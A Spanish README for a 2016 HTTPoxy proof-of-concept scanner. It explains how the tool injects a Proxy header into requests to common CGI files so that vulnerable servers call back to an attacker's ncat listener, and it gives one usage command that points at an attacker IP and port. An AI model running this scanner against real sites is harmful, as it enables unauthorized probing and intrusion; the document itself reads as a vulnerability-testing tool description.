
HTTPoxy Exploit Scanner por 1N3 @CrowdShield
por 1N3 @CrowdShield (https://crowdshield.com) Última actualización: 20160720
Escáner PoC/Exploit para escanear archivos CGI comunes en una URL objetivo en busca de la vulnerabilidad HTTPoxy. Httpoxy es un conjunto de vulnerabilidades que afectan al código de aplicaciones que se ejecutan en entornos CGI, o similares a CGI. Para más detalles, visite https://httpoxy.org.
Requiere ncat para establecer una sesión inversa
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
Esto escaneará https://target.com con una lista de archivos CGI comunes mientras inyecta un encabezado Proxy de vuelta a una IP:PUERTO determinada. Un listener inverso capturará la conexión entrante para confirmar que el sitio remoto es vulnerable.
No asumo ninguna responsabilidad por el mal uso o uso indebido de este exploit.